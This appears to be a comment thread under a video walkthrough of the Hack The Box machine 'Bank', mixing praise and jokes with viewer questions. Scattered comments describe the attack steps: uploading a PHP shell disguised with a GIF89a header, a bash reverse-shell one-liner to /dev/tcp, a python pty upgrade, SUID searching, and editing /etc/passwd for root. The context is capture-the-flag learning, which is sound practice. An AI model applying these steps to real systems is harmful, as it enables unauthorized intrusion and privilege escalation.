Quick tip: On the balance-transfer page if you click where it says "size" it arranges the files from smallest to largest so you don't need to wget them.
Sir this is Awais khan from PAKISTAN Lots of love from Pakistan Please make a video series on websites hacking and hacking methodologies . We will be really thankful to you ❤️
Anyone else having trouble with the initial command injection at 21:30? None of the commands I run see to work, I just see GIF89a on the screen and nothing else.
thanks for the walkthrough. I got stuck at the part where you spawn a TTY shell. I followed all the commands you did, and i was not able to scroll up and down within the shell to view command history. I tried shift + pg-up/down, ctrl + shift + pg-up/down. Still couldn't get it to work. Please let me know what i'm doing wrong. I'm using the default kali linux terminal.
The whole video is great but the last part I didn't understood how it is possible to change the password of a root user in passwd I mean password hashes are stored in shadow and accessed by OS for password verification if I'm not wrong and passwd file are used for operations like command 'ls', 'cat'... Etc to verify if user is in valid group to list a directory or read a file so my question is how u can change password with passwd file??????
I didn't understand this step, and we have to do it (the DNS enumeration) Shall I do this every time I get Apache default page as the main page?? why you didn't try to Gobuster it or something like that? can you explain this step for me please, I lost here
The DNS enumeration is because port 53 was open. This is where you can do zone tranfers etc.. As there was nothing more which could be done on that port , move on to the next.
no, he just did that so the browser doesn't automatically redirect him to login.php and he can stay on the page he was on ..... whenever a browser sees 302 it redirects to the link specified by the "location" response header
he sent an upload of a normal gif then intercepted the request that was going in burpsuite so he can modify it , then he kept the gif8 part so the server won't block that file and would think it was a valid gif when actually it was a php script to give him code execution on the server
thanks for the video! I did it myself first and didn't know a few things such as how handy the match and replace in burp could be for this purpose as well as the other methods to get in. I blindly did php-reverseshell into sudo -l and then checking for suids and then elevating. Should've done more post-exploitation enumeration to catch the other things you found. Could've also created another user with od 0 in /etc/passwd having write access right? As always fantastic vids, keep it up!
Hello, thanks for the reply! So I should have said I understood the theory of executing shell commands with PHP, all except the usage of "echo". Most places I was read didn't have echo in the PHP, just
Yep, the echo was just a mistake. There are like 3-4 different commands that allow PHP to execute shell commands, one of them does not automatically print to STDOUT so echo is needed. System by default prints to stdout in PHP, so the echo there makes it print the result twice.
Hey man, now I know you cannot give me the answer but I’ve been stuck on the devel box for a while now. Anyways I have no issue getting a meterpreter, my issue is then trying to escalate privs so I can get the flag. Any helpful hints you could share with me?
you taught me how to cancel redirects, thanks. super helpful!
Quick tip: On the balance-transfer page if you click where it says "size" it arranges the files from smallest to largest so you don't need to wget them.
Woah why didnt i think of that
Nice Video Ippsec always fantastic Tutorial, JUST a note I clicked the Size on 13:59 and it shows 257kb file it saves a little time :)
Thank you Ippsec for this Walkthrough. I've learned some new tricks!
Sir this is Awais khan from PAKISTAN
Lots of love from Pakistan
Please make a video series on websites hacking and hacking methodologies .
We will be really thankful to you ❤️
Thanks for showing the privesc, didn't manage to get that one before it was retired :)
Great stuff. Learned a bunch. Definetly using that python command on NC shells! Did not know that!
Great work IPPSEC thanks for sharing
At 5:20, why didn't you just CTR+F the source for timestamp[column delimiter]2 ?
15:00 could’ve just sorted it by file size in the webpage 💔
exactly
George O That was so aggravating to watch uuuurgh!
i used curl and grep -v
Where can i learn all these commands?I have been studying shell script but i still don't know, how to write this commands.?
thanks for helping me out in solving my 15th box
Anyone else having trouble with the initial command injection at 21:30? None of the commands I run see to work, I just see GIF89a on the screen and nothing else.
thanks for the walkthrough. I got stuck at the part where you spawn a TTY shell. I followed all the commands you did, and i was not able to scroll up and down within the shell to view command history. I tried shift + pg-up/down, ctrl + shift + pg-up/down. Still couldn't get it to work. Please let me know what i'm doing wrong. I'm using the default kali linux terminal.
u should do the python -c 'import pty;pty.spawn('/bin/bash')'...... this will give u arrow functions on the shell
31:22 would that work on the other files if root owns em??
Namp result second line has the bank.htb(10.10.10.29) Guessing not required.
Hey Ipp
What did you filter out from the dirbuster wordlist to create the bank one?
Dude these are so cool
Where did you learn all this? you are skilled bro! none of the courses teach you that much stuff which you're sharing with us!
This guy must have worked for CIA
@@7Shol I'm from FBI
@@moviesentertainment9623 yea? and my dad is Brad Pitt
Quite right bro, we all wondering about that , 🤨 maybe he's the maker of hackthebox Hahahhhh
After a long time of doing such you will learn. Takes practise and time
Hey IppSec,
Could you please demonstrate the Luke Box too ?
Thanks in advance.
Great video, thank you.
30:30 could you please explain more about this command? find / -perm -4000 2>/dev/null
-perm -4000: permission setid; 2>/dev/null: throw away error msg
Why can't we use 'bash -i >& /dev/tcp/10.0.0.0/8080 0>&1' in this case? I've tried some of reverse shell but failed
Hi Ippsec, thank you so much for your video.
I have a question - Do we needed import PTY or it's just for comfortable future work ?
he does those things to get arrow functions and auto complete on the shell
Great Work Man
thx for sharing.. great work...
Thank you so much.
Your job is so amazing, do you have some video of how do you navigate through the bash windows?
yes, the tool is called tmux and he made a video about it
The whole video is great but the last part I didn't understood how it is possible to change the password of a root user in passwd I mean password hashes are stored in shadow and accessed by OS for password verification if I'm not wrong and passwd file are used for operations like command 'ls', 'cat'... Etc to verify if user is in valid group to list a directory or read a file so my question is how u can change password with passwd file??????
Which desktop environment are you using and how to get terminal which you are using?
he's using temux for terminal and he has a video about it
I had a hard time getting the login code for hack the box. Any assist?
I didn't understand this step, and we have to do it (the DNS enumeration)
Shall I do this every time I get Apache default page as the main page??
why you didn't try to Gobuster it or something like that?
can you explain this step for me please, I lost here
The DNS enumeration is because port 53 was open. This is where you can do zone tranfers etc.. As there was nothing more which could be done on that port , move on to the next.
Thanks man.. you are the best :)
the best new trick method
Changing 302 to 200 does this works because of VirtualHost ?
no, he just did that so the browser doesn't automatically redirect him to login.php and he can stay on the page he was on ..... whenever a browser sees 302 it redirects to the link specified by the "location" response header
everything was going great until the corners.gif part. Is that just a text file with gif8 in it? is it a shell?
he sent an upload of a normal gif then intercepted the request that was going in burpsuite so he can modify it , then he kept the gif8 part so the server won't block that file and would think it was a valid gif when actually it was a php script to give him code execution on the server
thanks for the video! I did it myself first and didn't know a few things such as how handy the match and replace in burp could be for this purpose as well as the other methods to get in. I blindly did php-reverseshell into sudo -l and then checking for suids and then elevating. Should've done more post-exploitation enumeration to catch the other things you found. Could've also created another user with od 0 in /etc/passwd having write access right? As always fantastic vids, keep it up!
Can anyone give me an idea why
Read up on php system(), or executing shell commands with php. I believe that is the command prompt you are expecting
Hello, thanks for the reply! So I should have said I understood the theory of executing shell commands with PHP, all except the usage of "echo". Most places I was read didn't have echo in the PHP, just
Yep, the echo was just a mistake. There are like 3-4 different commands that allow PHP to execute shell commands, one of them does not automatically print to STDOUT so echo is needed. System by default prints to stdout in PHP, so the echo there makes it print the result twice.
Thanks again
amazing video
Hey man, now I know you cannot give me the answer but I’ve been stuck on the devel box for a while now. Anyways I have no issue getting a meterpreter, my issue is then trying to escalate privs so I can get the flag. Any helpful hints you could share with me?
You may pick up a trick or two watching my Arctic or Bastard video.
IppSec ah thank you! Il get to watching those now :) appreciate the help!
Great job men
Greetings from CS-GO
chris. is an email address not a dns name
as usual, whenever I try to use burpsuite, nothing happens and I get zero information
have you set your proxy correctly in your browser?
Cool realy
Where is the flag????
/root/root.txt -- I try not to show flags so you can't just type them in without doing the box.
IppSec yup! Thanks... this was really helpfull
30:50 ippsec got hacked haha
How many Indian's are here.... Give attendance 👍👍👍👍
brother am here